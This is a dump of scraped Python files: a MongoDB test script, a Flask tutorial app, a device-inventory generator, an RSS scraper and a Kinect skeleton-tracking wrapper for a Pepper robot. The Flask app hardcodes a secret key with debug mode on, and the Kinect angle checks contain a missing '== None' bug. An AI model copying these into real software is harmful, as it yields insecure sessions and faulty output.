img2)\r\n\r\ncv2.waitKey(0)\r\n\r\n#hist = cv2.calcHist([img],[0],None,[256],[0,256])\r\n\r\n#plt.hist(img.ravel(),256,[0,256]); plt.show()","sub_path":"binary.py","file_name":"binary.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"431353531","text":"import pymongo\nimport power_analysis_day\nfrom datetime import datetime\nfrom random import randint\n\npad = power_analysis_day\n#client = pymongo.MongoClient(\"localhost\", 27017)\n#db = client.test\n\n\ndef main():\n\n\t# Original method\n\tjob = {\n\t \"energyhubid\": \"78:a5:04:ff:40:bb\",\n\t \"starttime\": datetime(2016,10,1,0,0,0),\n\t \"endtime\": datetime(2016,10,2,0,0,0),\n\t \"userid\": \"testuser\",\n\t \"resultsid\":\"ABCD\" + str(randint(0,1000)),\n\t \"analysismodel\":\"DAILYPOWER\",\n\t \"jobstatus\":0\n\t}; \n\n\t##pad.mdb_insert_poweranalysisday_job(job)\n\t##data = pad.mdb_get_energy_counter_data_grouped(job)\n\t##base_values = []\n\t##hub_aggr = pad.get_energy_counter_aggregate(data, base_values)\n\t##print(\"------------------------------\")\n\t##print(list(hub_aggr))\n\n\n\t# New method\n\tdata = pad.mdb_get_energy_counter_data_new(job)\n\tbase_values = []\n\n\thug_aggr = pad.get_energy_counter_aggregate_new(data, base_values)\n\t\n\tprint(list(hug_aggr))\n\t##print(\"------------------------------\")\n\t##print(data)\n\t\n\n\t\"\"\"\n{\n \"energyhubid\": \"78:a5:04:ff:40:bb\",\n \"starttime\": \"2016-10-01T04:00:00.000Z\",\n \"endtime\": \"2016-10-01T09:00:00.000Z\",\n \"userid\": \"845\"\n}\n\"\"\"\n#print(db.poweranalysishour_jobs.insert_one(job).inserted_id)\n\n\n#print(db.name)\n#print(db.test_poweranalysisday_jobs)\n#print(db.test_poweranalysisday_jobs.insert_one({\"x\": 8}).inserted_id)\n#print(db.test_poweranalysisday_jobs.find_one())\n\n#date = \"2016-10-18 00:00:00\"\n#datestr = datetime.strptime(date, \"%Y-%m-%d %H:%M:%S\")\n#print(datestr)\n#date2 = \"2016-10-18 23:00:00\"\n#date2str = datetime.strptime(date2, \"%Y-%m-%d %H:%M:%S\")\n#print(date2str)\n#print(\"Hello you handsome devil!\")\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n main()","sub_path":"vivi_testing.py","file_name":"vivi_testing.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"360261760","text":"# tmplt_variables.py\n'''\nCommand to create virtual environment 'env' for this flask app : \n python -m venv env \n\nCommand to activate the virtual environment 'env' :\n env\\Scripts\\activate.bat \n\nCommand to install flask :\n pip install flask \n\nCommand to set the flask-DEBUG environment variable on :\n set FLASK_DEBUG=1\n\nCommand to run this flask app:\n python tmplt_variables.py\n\nCommand to Deactivate the virtual environment 'env' :\n deactivate \n'''\n\nfrom flask import Flask, jsonify, request, redirect, url_for, session, render_template\n\napp = Flask(__name__) \napp.config['DEBUG'] = True\napp.config['SECRET_KEY'] = 'somesecrettosignthecookiewith'\n\n@app.route('/')\ndef index():\n session.pop('name', None)\n return '

Hello!

'\n\n@app.route('/home', methods=['GET'], defaults={'name': 'Default Name'})\n@app.route('/home/', methods=['POST', 'GET'])\ndef home(name):\n session['name'] = name\n return render_template (\n 'home.html', \n name=name, \n display=True,\n mylist=['one', 'two', 'three', 'four'],\n listofdicts=[{'name': 'Zach'}, {'name': 'Zoe'}]\n )\n # return '

Hello {}! You are on the HOME page!

'.format(name)\n\n@app.route('/json')\ndef json():\n if 'name' in session:\n name = session['name']\n else:\n name = 'NotInSession!'\n return jsonify({'key': 'value', 'key2': [1, 2, 3], 'name': name})\n\n@app.route('/query')\ndef query():\n query_name = request.args.get('name')\n query_location = request.args.get('location')\n return '

Hello {} from {}! You are on the QUERY page!

'.format(query_name, query_location)\n\n@app.route('/theform', methods=['GET', 'POST'])\ndef theform():\n if request.method == 'GET':\n return render_template('form.html')\n else:\n form_name = request.form['name']\n form_location = request.form['location']\n # return redirect(url_for('home'))\n return redirect(url_for('home', name=form_name, location=form_location))\n\n'''\n@app.route('/theform', methods=['POST'])\ndef process():\n form_name = request.form['name']\n form_location = request.form['location']\n return 'Hi {} from {}, you have submitted the form successfully!'.format(form_name, form_location)\n'''\n\n@app.route('/processjson', methods=['POST'])\ndef processjson():\n data = request.get_json()\n json_name = data['name']\n json_loc = data['location']\n randomlist = data['randomlist']\n return jsonify({'result': 'Success!',\n 'name': json_name,\n 'location': json_loc,\n 'randomkeyinlist': randomlist[1],\n })\n\n\nif __name__ == '__main__':\n app.run()\n\n\n\n\n","sub_path":"tmplts/tmplt_variables.py","file_name":"tmplt_variables.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"293002636","text":"from random import choice\nimport string\nfrom tabulate import tabulate\nfrom operator import itemgetter\nfrom pprint import pprint\n\n# empty list for holding devices\ndevices = list()\n\n# add comment\n\n# for loop to create large number of devices\nfor index in range(1,101):\n # create device dictionary\n device = dict()\n\n # random device name\n device[\"name\"] = (\n choice([\"r2\", \"r3\", \"r4\", \"r6\", \"r10\"])\n + choice([\"L\", \"U\"])\n + choice(string.ascii_letters)\n )\n\n # random vendor from choice of Cisco, Juniper, Arista\n device[\"vendor\"] = choice([\"Cisco\", \"Juniper\", \"Arista\"])\n if device[\"vendor\"] == \"Cisco\":\n device[\"os\"] = choice([\"ios\" , \"iosxe\", \"iosxr\", \"nxos\"])\n device[\"version\"] = choice([\"12.1(T)\", \"7.0.3.9\", \"14.07X\", \"20.45\"])\n elif device[\"vendor\"] == \"Juniper\":\n device[\"os\"] = \"junos\"\n device[\"version\"] = choice([\"J6.23.1\", \"8.43.12\", \"6.45\", \"6.03\"])\n elif device[\"vendor\"] == \"Arista\":\n device[\"os\"] = \"eos\"\n device[\"version\"] = choice([\"2.45\", \"3.38\"])\n \n # assign IP Address\n device[\"ip\"] = \"10.0.0.\" + str(index)\n\n print()\n for key,value in device.items():\n print(f\"{key:>16s} : {value}\")\n\n # add the device to the list of devices\n devices.append(device)\n\n\n\n# use pprint to print data as-is\nprint(\"\\n_______ Pretty Print _______\")\npprint(devices)\n\n# use 'tabulate' to print table of devices\nprint(\"\\n_______ Sorted devices in tabular format _______\")\nprint(tabulate(sorted(devices, key=itemgetter(\"vendor\", \"os\", \"version\")),headers=\"keys\"))","sub_path":"52 Weeks of Python/Basics/devices.py","file_name":"devices.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"528869423","text":"#XML - Xtensible Mark Up language\n#supposed to be legible for humans and machines\n#commonly used in RSS feeds.\n#introduce BeautifulSoup - PYthon module to deal with web scraping.\n\nfrom bs4 import BeautifulSoup\nimport urllib.request\n\nreq = urllib.request.urlopen('https://abcnews.go.com/abcnews/topstories')\n\n#will default data to Html without XML parameter\nxml = BeautifulSoup(req, features=\"xml\")\n\n\n#print first item twice. use [1:] print past first item.\nfor item in xml.findAll('link')[2:]: #findall() parameter is tags [Title, link, etc]\n url = item.text\n news = urllib.request.urlopen(url).read()\n print(news)\n print(20*\"#\")\n#to remove use .text\n\n\n\n\n\n\n\n\n\n\n\n\nprint(\"\\n\\n\\n\\n\\nEngadget:\\n\\n\")\n\nreq = urllib.request.urlopen('https://www.engadget.com/tag/rss/')\nxml = BeautifulSoup(req, features=\"xml\")\n\nfor item in xml.findAll('item'): #findall() parameter is tags [Title, link, etc]\n print(item)\n","sub_path":"Python_Tut_v2/xmltut.py","file_name":"xmltut.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"379260053","text":"'''\r\n-------------------------------------------------------------------------------------------\r\n# Based on the example \"PyKinectBodyGame.py\" provided by PyKinect2\r\n# This code was released under the MIT license:\r\n#\r\n# The MIT License (MIT)\r\n#\r\n# Copyright (c) Microsoft\r\n#\r\n# Permission is hereby granted, free of charge, to any person obtaining a copy\r\n# of this software and associated documentation files (the \"Software\"), to deal\r\n# in the Software without restriction, including without limitation the rights\r\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\r\n# copies of the Software, and to permit persons to whom the Software is\r\n# furnished to do so, subject to the following conditions:\r\n#\r\n# The above copyright notice and this permission notice shall be included in all\r\n# copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\r\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\r\n# SOFTWARE.\r\n--------------------------------------------------------------------------------------------\r\n# Relevant modifications to the base script made at HEIG-VD are highlighted and/or commented\r\n# Developpers:\r\n# Julien Rebetez\r\n# Eric Henchoz\r\n# Hector Satizabal\r\n# Institute IICT, HEIG-VD 2016\r\n#\r\n# This script employs the quaternions provided by the Kinect2 SDK. Each\r\n# quaternion represents the absolute orientation of its parent bone, e.g.,\r\n# the quaternion at the wrist represents the absolute orientation of the\r\n# lower arm bone. In order to obtain orientations relative to a certain base,\r\n# we pre-multiplied the quaternion by the inverse of the base quaternion,\r\n# e.g., Qwrist-elbow = inv(Qelbow) * Qwrist. Relative orientations were then\r\n# transformed into rotation matrices in order to obtain the Euler angles\r\n# describing the 3 rotations: pitch, roll and yaw. We used the order 'syzx'\r\n# which means that the rotations were done with respect to the static\r\n# reference and they are applied in the following order: (1)pitch around x,\r\n# (2)roll around z and (3)yaw around y. This order matchs the construction\r\n# constaints of the robot. The sequence 'syzx' was empirically found by first\r\n# making the two coordinate systems to match (moving the limbs and making\r\n# both bones colinear), and then finding the sequence of axes around wich\r\n# rotations has to be made.\r\n----------------------------------------------------------------------------------------------\r\nCreated on 14/09/2017\r\n\r\n@author: Mk Eng: Francisco Javier Gonzalez Lopez.\r\n\r\nThis wrapper get an image with the Kinect camera, the image is transformed into \r\na RGB format in the main script to show it in the GUI. With the kinect is possible \r\nget the skeleton tracking, and compute the joint's angles to recognize the mood \r\nof the person and \"teach\" to the Robot Pepper body language, also is possible control\r\ndirectly the Robot Pepper.\r\n'''\r\n# Are imported the wrappers that have the methods to get the skeleton joints angles.\r\nimport sys \r\nfrom pykinect2 import PyKinectV2\r\nfrom pykinect2 import PyKinectRuntime\r\nimport ctypes\r\nfrom pygame import color, draw, Surface, surfarray\r\nimport numpy as np\r\nimport cv2\r\nfrom math import pi\r\nimport transformations as tf\r\n\r\n# Is defined a vector that has the parameters to draw the skeleton.\r\nSkeletonColors = [color.THECOLORS[\"green\"], color.THECOLORS[\"red\"]] \r\n\r\n# Is activated the tracking of the wrist.\r\nENABLE_WRIST = True\r\n\r\ndef Add_Angles(alpha, beta):\r\n '''\r\n This function return the add of two angles, getting the result\r\n into the interval [-pi,pi]\r\n '''\r\n Add = alpha + beta\r\n\r\n while np.abs(Add) > (2*pi):\r\n if Add > 0:\r\n Add -= 2*pi\r\n else:\r\n Add += 2*pi \r\n\r\n if Add > pi:\r\n return Add - (2*pi) \r\n elif Add < -pi:\r\n return Add + (2*pi) \r\n else:\r\n return Add \r\n\r\nclass Kinect_Tracking(object):\r\n '''\r\n Wrapper class to use the Kinect V2 Camera to get the skeleton tracking\r\n The current implementation return the eulerian angles (Pitch, Yaw, Roll) \r\n of each bodie's joint: Head, Shoulders, Elbows, Wrist, Hip, Knee; and the \r\n state of the hands (Open-Close)\r\n '''\r\n def __init__(self):\r\n self.Bodies = None\r\n \r\n def Open_Kinect(self): \t # Manual Start of the Kinect V2 Camera. \r\n self.Kinect = PyKinectRuntime.PyKinectRuntime(PyKinectV2.FrameSourceTypes_Color | PyKinectV2.FrameSourceTypes_Body)\r\n self.FrameSurface = Surface((self.Kinect.color_frame_desc.Width, self.Kinect.color_frame_desc.Height), 0, 32)\r\n \r\n def Stop_Kinect(self): # Manual Stop of the Kinect V2 Camera.\r\n self.Kinect.close()\r\n \r\n def DrawColorFrame(self, Frame, TargetSurface):\r\n '''\r\n Function that decode the image get with the Kinect V2 Camera and \r\n convert it in a compatible color image puting it in a pygame's surface.\r\n '''\r\n TargetSurface.lock()\r\n address = self.Kinect.surface_as_array(TargetSurface.get_buffer()) # Function that get the color image and save the frame.\r\n ctypes.memmove(address, Frame.ctypes.data, Frame.size) # C function that return a compatible color image.\r\n del address\r\n TargetSurface.unlock()\r\n \r\n def SelectNearestBody(self):\r\n '''\r\n Function that determined the nearest body in the image get with the \r\n Kinect V2 Camera and return the information of that body.\r\n '''\r\n NearestBody = None\r\n NearestDistance = float('inf')\r\n \r\n for i in range(0, self.Kinect.max_body_count):\r\n Body = self.Bodies.bodies[i] \r\n if not Body.is_tracked: \r\n continue\r\n \r\n Spine = Body.joints[PyKinectV2.JointType_SpineBase].Position # Spine coordinates.\r\n Distance = np.sqrt((Spine.x**2)+(Spine.y**2)+(Spine.z**2)) # Compute the eucledian distance of the body to the Kinect V2 Camera.\r\n\r\n if Distance < NearestDistance:\r\n NearestDistance = Distance\r\n NearestBody = Body\r\n \r\n return NearestBody \r\n\r\n def DrawBody(self, Joints, JointsPoints, Color):\r\n '''\r\n Function that send the parameters get with the Kinect V2 Camera\r\n to draw the skeleton.\r\n '''\r\n # Torso\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_Head, PyKinectV2.JointType_Neck)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_Neck, PyKinectV2.JointType_SpineShoulder)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_SpineShoulder, PyKinectV2.JointType_SpineMid)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_SpineMid, PyKinectV2.JointType_SpineBase)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_SpineShoulder, PyKinectV2.JointType_ShoulderRight)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_SpineShoulder, PyKinectV2.JointType_ShoulderLeft)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_SpineBase, PyKinectV2.JointType_HipRight)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_SpineBase, PyKinectV2.JointType_HipLeft)\r\n \r\n # Right Arm\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_ShoulderRight, PyKinectV2.JointType_ElbowRight)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_ElbowRight, PyKinectV2.JointType_WristRight)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_WristRight, PyKinectV2.JointType_HandRight)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_HandRight, PyKinectV2.JointType_HandTipRight)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_WristRight, PyKinectV2.JointType_ThumbRight)\r\n\r\n # Left Arm\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_ShoulderLeft, PyKinectV2.JointType_ElbowLeft)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_ElbowLeft, PyKinectV2.JointType_WristLeft)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_WristLeft, PyKinectV2.JointType_HandLeft)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_HandLeft, PyKinectV2.JointType_HandTipLeft)\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_WristLeft, PyKinectV2.JointType_ThumbLeft)\r\n\r\n # Right Leg\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_HipRight, PyKinectV2.JointType_KneeRight);\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_KneeRight, PyKinectV2.JointType_AnkleRight);\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_AnkleRight, PyKinectV2.JointType_FootRight);\r\n\r\n # Left Leg\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_HipLeft, PyKinectV2.JointType_KneeLeft);\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_KneeLeft, PyKinectV2.JointType_AnkleLeft);\r\n self.DrawBodyBones(Joints, JointsPoints, Color, PyKinectV2.JointType_AnkleLeft, PyKinectV2.JointType_FootLeft);\r\n\r\n def Angles(self, Joints, Orientations, Body, Type):\r\n '''\r\n Function that calculated the joint's angles of the skeleton get with the\r\n Kinect V2 Camera, getting the quaternion matrix and then calculating the\r\n eulerian angles.\r\n\r\n If the skeleton tracking is not correct, complete or parcial, the \r\n corresponding angles are define like \"None\"; after that the angle are \r\n verified, they are saved in the corresponding lists.\r\n ''' \r\n # Hip angles.\r\n if (Joints[PyKinectV2.JointType_SpineShoulder].TrackingState == 2) and (Joints[PyKinectV2.JointType_SpineBase].TrackingState == 2): \r\n ChestQuat = self.Quaternion(Orientations, PyKinectV2.JointType_SpineBase) \r\n HipAngles = tf.euler_from_quaternion(ChestQuat, 'syzx') \r\n \r\n WaistPitch = HipAngles[2]\r\n WaistRoll = HipAngles[1]\r\n \r\n # Right Leg angles.\r\n if (Joints[PyKinectV2.JointType_HipRight].TrackingState == 2) and (Joints[PyKinectV2.JointType_KneeRight].TrackingState == 2):\r\n LegQuat = self.Quaternion(Orientations, PyKinectV2.JointType_KneeRight, PyKinectV2.JointType_HipRight )\r\n LegAngles = tf.euler_from_quaternion(LegQuat, 'syzx')\r\n \r\n RHipPitch = LegAngles[2]\r\n RHipRoll = LegAngles[1]\r\n \r\n # Right Knee angles.\r\n if (Joints[PyKinectV2.JointType_AnkleRight].TrackingState == 2):\r\n KneeQuat = self.Quaternion(Orientations, PyKinectV2.JointType_AnkleRight, PyKinectV2.JointType_KneeRight)\r\n KneeAngles = tf.euler_from_quaternion(KneeQuat, 'syzx')\r\n\r\n RKneeRoll = KneeAngles[1]\r\n RKneeYaw = KneeAngles[0]\r\n \r\n else:\r\n RKneeRoll = None\r\n RKneeYaw = None\r\n \r\n else:\r\n RKneeRoll = None\r\n RKneeYaw = None\r\n\r\n RHipPitch = None\r\n RHipRoll = None\r\n\r\n # Left Leg angles.\r\n if (Joints[PyKinectV2.JointType_HipLeft].TrackingState == 2) and (Joints[PyKinectV2.JointType_KneeLeft].TrackingState == 2):\r\n LegQuat = self.Quaternion(Orientations, PyKinectV2.JointType_KneeLeft, PyKinectV2.JointType_HipLeft)\r\n LegAngles = tf.euler_from_quaternion(LegQuat, 'syzx')\r\n\r\n LHipPitch = LegAngles[2]\r\n LHipRoll = LegAngles[1]\r\n \r\n # Left Knee angles.\r\n if (Joints[PyKinectV2.JointType_AnkleLeft].TrackingState == 2):\r\n KneeQuat = self.Quaternion(Orientations, PyKinectV2.JointType_AnkleLeft, PyKinectV2.JointType_KneeLeft)\r\n KneeAngles = tf.euler_from_quaternion(KneeQuat, 'syzx')\r\n\r\n LKneeRoll = KneeAngles[1]\r\n LKneeYaw = KneeAngles[0]\r\n \r\n else:\r\n LKneeRoll = None\r\n LKneeYaw = None\r\n \r\n else:\r\n LKneeRoll = None\r\n LKneeYaw = None\r\n\r\n LHipPitch = None\r\n LHipRoll = None \r\n \r\n # Head angles\r\n if (Joints[PyKinectV2.JointType_Neck].TrackingState == 2) and (Joints[PyKinectV2.JointType_Head].TrackingState == 2):\r\n NeckPos = Joints[PyKinectV2.JointType_Neck].Position\r\n HeadPos = Joints[PyKinectV2.JointType_Head].Position\r\n\r\n Diference = np.array([(HeadPos.x - NeckPos.x), (HeadPos.y - NeckPos.y), (HeadPos.z - NeckPos.z)]) # Pitch angle is calculates with head and Neck coordinates.\r\n \r\n HeadPitch = np.arctan2(-Diference[2], Diference[1])\r\n \r\n else:\r\n HeadPitch = None\r\n \r\n # Right Shoulder angles.\r\n if (Joints[PyKinectV2.JointType_ShoulderRight].TrackingState == 2) and (Joints[PyKinectV2.JointType_ElbowRight].TrackingState == 2):\r\n ElbowRQuat = self.Quaternion(Orientations, PyKinectV2.JointType_ElbowRight, PyKinectV2.JointType_SpineShoulder) \r\n ShoulderRAngles = tf.euler_from_quaternion(ElbowRQuat, 'syzx')\r\n \r\n RShoulderPitch = Add_Angles(-np.pi/2, ShoulderRAngles[2])\r\n RShoulderRoll = -ShoulderRAngles[1]\r\n \r\n # Right Elbow angles.\r\n if Joints[PyKinectV2.JointType_WristRight].TrackingState == 2:\r\n WristRQuat = self.Quaternion(Orientations, PyKinectV2.JointType_WristRight, PyKinectV2.JointType_ElbowRight) \r\n ElbowRAngles = tf.euler_from_quaternion(WristRQuat, 'syzx') \r\n \r\n RElbowYaw = -Add_Angles(np.pi, -ShoulderRAngles[0])\r\n RElbowRoll = ElbowRAngles[1]\r\n \r\n # Right Wrist angle.\r\n if ENABLE_WRIST:\r\n \r\n WristQuat = self.Quaternion(Orientations, PyKinectV2.JointType_WristRight)\r\n WristAngles = tf.euler_from_quaternion(WristQuat, 'syzx')\r\n \r\n RWristYawE = WristAngles[0]\r\n RWristYawP = -Add_Angles(np.pi/2, -ElbowRAngles[0])\r\n \r\n else:\r\n RWristYawE = None\r\n RWristYawP = None\r\n \r\n # Right Hand state.\r\n if (Joints[PyKinectV2.JointType_HandTipRight].TrackingState == 2) and (Joints[PyKinectV2.JointType_ThumbRight].TrackingState == 2):\r\n if Body.hand_right_state == 3:\r\n HandR = 2 # Hand closed.\r\n elif Body.hand_right_state == 2:\r\n HandR = 1 # Hand opened.\r\n else:\r\n HandR = 3 # Unknown state.\r\n \r\n else:\r\n HandR = None\r\n\r\n else:\r\n RElbowYaw = None\r\n RElbowRoll = None\r\n\r\n RWristYawE = None\r\n RWristYawP = None\r\n \r\n HandR = None\r\n \r\n else:\r\n RShoulderPitch = None\r\n RShoulderRoll = None\r\n \r\n RElbowYaw = None\r\n RElbowRoll = None\r\n\r\n RWristYawE = None\r\n RWristYawP = None\r\n \r\n HandR = None\r\n\r\n # Left Shoulder angles.\r\n if (Joints[PyKinectV2.JointType_ShoulderLeft].TrackingState == 2) and (Joints[PyKinectV2.JointType_ElbowLeft].TrackingState == 2):\r\n ElbowLQuat = self.Quaternion(Orientations, PyKinectV2.JointType_ElbowLeft, PyKinectV2.JointType_SpineShoulder) \r\n ShoulderLAngles = tf.euler_from_quaternion(ElbowLQuat, 'syzx') \r\n \r\n LShoulderPitch = Add_Angles(-np.pi/2, ShoulderLAngles[2])\r\n LShoulderRoll = -ShoulderLAngles[1]\r\n\r\n # Left Elbow angles.\r\n if Joints[PyKinectV2.JointType_WristLeft].TrackingState == 2:\r\n WristLQuat = self.Quaternion(Orientations, PyKinectV2.JointType_WristLeft, PyKinectV2.JointType_ElbowLeft) \r\n ElbowLAngles = tf.euler_from_quaternion(WristLQuat, 'syzx') \r\n \r\n LElbowYaw = -Add_Angles(np.pi, -ShoulderLAngles[0])\r\n LElbowRoll = ElbowLAngles[1]\r\n \r\n # Left Wrist angles.\r\n if ENABLE_WRIST:\r\n WristQuat = self.Quaternion(Orientations, PyKinectV2.JointType_WristLeft)\r\n WristAngles = tf.euler_from_quaternion(WristQuat, 'syzx')\r\n \r\n LWristYawE = WristAngles[0]\r\n LWristYawP = -Add_Angles(np.pi/2, -ElbowLAngles[0])\r\n \r\n else:\r\n LWristYawE = None\r\n LWristYawP = None\r\n\r\n # Left Hand state.\r\n if (Joints[PyKinectV2.JointType_HandTipLeft].TrackingState == 2) and (Joints[PyKinectV2.JointType_ThumbLeft].TrackingState == 2):\r\n if Body.hand_left_state == 3:\r\n HandL = 2 # Hand closed.\r\n elif Body.hand_left_state == 2:\r\n HandL = 1 # Hand opened. \r\n else:\r\n HandL = 3 # Unknown state.\r\n \r\n else:\r\n HandL = None\r\n \r\n else:\r\n LElbowYaw = None\r\n LElbowRoll = None\r\n \r\n LWristYawE = None\r\n LWristYawP = None\r\n \r\n HandL = None\r\n \r\n else:\r\n LShoulderPitch = None\r\n LShoulderRoll = None\r\n\r\n LElbowYaw = None\r\n LElbowRoll = None\r\n \r\n LWristYawE = None\r\n LWristYawP = None\r\n \r\n HandL = None\r\n \r\n if Type == 'Emotion':\r\n if HeadPitch == None or RShoulderRoll == None or RShoulderPitch == None or RElbowYaw == None or RElbowRoll == None or RWristYawE == None or HandR == None or LShoulderRoll == None or LShoulderPitch == None or LElbowYaw == None or LElbowRoll == None or LWristYawE == None or HandL or WaistRoll == None or WaistPitch == None or RHipRoll == None or RHipPitch == None or RKneeYaw == None or RKneeRoll == None or LHipRoll == None or LHipPitch == None or LKneeYaw == None or LKneeRoll == None: \r\n return None\r\n \r\n else:\r\n return np.transpose([[HeadPitch], \r\n [RShoulderRoll], [RShoulderPitch], [RElbowYaw], [RElbowRoll], [RWristYawE], [HandR], \r\n [LShoulderRoll], [LShoulderPitch], [LElbowYaw], [LElbowRoll], [LWristYawE], [HandL],\r\n [WaistRoll], [WaistPitch],\r\n [RHipRoll], [RHipPitch], [RKneeYaw], [RKneeRoll],\r\n [LHipRoll], [LHipPitch], [LKneeYaw], [LKneeRoll]]) \r\n \r\n if Type == 'Pepper':\r\n if HeadPitch == None or RShoulderRoll == None or RShoulderPitch == None or RElbowYaw == None or RElbowRoll == None or RWristYawP == None or HandR == None or LShoulderRoll == None or LShoulderPitch == None or LElbowYaw == None or LElbowRoll == None or LWristYawP == None or HandL or WaistRoll == None or WaistPitch == None:\r\n return None\r\n \r\n else:\r\n return np.transpose([[HeadPitch], \r\n [RShoulderRoll], [RShoulderPitch], [RElbowYaw], [RElbowRoll], [RWristYawP], [HandR], \r\n [LShoulderRoll], [LShoulderPitch], [LElbowYaw], [LElbowRoll], [LWristYawP], [HandL],\r\n [WaistRoll], [WaistPitch]]) \r\n \r\n def DrawBodyBones(self, Joints, JointsPoints, Color, Joint0, Joint1):\r\n '''\r\n Function that draw the skeleton in a frame.\r\n '''\r\n Joint0State = Joints[Joint0].TrackingState;\r\n Joint1State = Joints[Joint1].TrackingState;\r\n\r\n # If is not correct the tracking:\r\n if (Joint0State == PyKinectV2.TrackingState_NotTracked) or (Joint1State == PyKinectV2.TrackingState_NotTracked): \r\n return\r\n\r\n if (Joint0State == PyKinectV2.TrackingState_Inferred) and (Joint1State == PyKinectV2.TrackingState_Inferred):\r\n return\r\n\r\n # If the skeleton tracking is correct:\r\n Start = (JointsPoints[Joint0].x, JointsPoints[Joint0].y) # Start point coordinates.\r\n End = (JointsPoints[Joint1].x, JointsPoints[Joint1].y) # Final point coordinates.\r\n\r\n # Draw a line with start and final points.\r\n try:\r\n if (Joint0State == PyKinectV2.TrackingState_Inferred) or (Joint1State == PyKinectV2.TrackingState_Inferred):\r\n draw.line(self.FrameSurface, Color[1], Start, End, 8)\r\n \r\n else:\r\n draw.line(self.FrameSurface, Color[0], Start, End, 8)\r\n \r\n except: \r\n pass\r\n\r\n def Quaternion(self, Orientations, Joint, ParentJoint = None):\r\n '''\r\n Function that computes the quaternion matrix using the coordinates of\r\n each joint get with the Kinect V2 Camera.\r\n ''' \r\n Quat = Orientations[Joint].Orientation \r\n QArray = np.array([Quat.w, Quat.x, Quat.y, Quat.z]) \r\n \r\n # Quat matrix with two joints.\r\n if ParentJoint is not None:\r\n QuatParent = Orientations[ParentJoint].Orientation \r\n QuatArrayParent = np.array([QuatParent.w, QuatParent.x, QuatParent.y, QuatParent.z]) \r\n QuatRelativ = tf.quaternion_multiply(tf.quaternion_inverse(QuatArrayParent), QArray) # Compute the relative quat.\r\n \r\n return QuatRelativ\r\n \r\n else: \r\n return QArray\r\n \r\n def RunKinect(self, Type):\r\n '''\r\n Function that do the tracking process and draw the skeleton in a frame\r\n compatible with the cv2 format.\r\n ''' \r\n if self.Kinect.has_new_color_frame():\r\n Frame = self.Kinect.get_last_color_frame() # Save the image get with the Kinect V2 Camera.\r\n self.DrawColorFrame(Frame, self.FrameSurface) \r\n Frame = None\r\n \r\n if self.Kinect.has_new_body_frame(): \r\n self.Bodies = self.Kinect.get_last_body_frame() # Save the bodies present in the image.\r\n\r\n if self.Bodies is not None:\r\n Body = self.SelectNearestBody() # Select the nearest body.\r\n\r\n if Body is not None: # Draw and compute the body's joint angles.\r\n Joints = Body.joints\r\n JointsPoints = self.Kinect.body_joints_to_color_space(Joints)\r\n Orientations = Body.joint_orientations \r\n self.DrawBody(Joints, JointsPoints, SkeletonColors)\r\n AnglesSecuence = self.Angles(Joints, Orientations, Body, Type)\r\n \r\n return self.FrameSurface, AnglesSecuence\r\n \r\n else:\r\n return self.FrameSurface, None\r\n \r\n else:\r\n return self.FrameSurface, None\r\n \r\n else:\r\n return self.FrameSurface, None\r\n \r\n else:\r\n return self.FrameSurface, None\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Complet 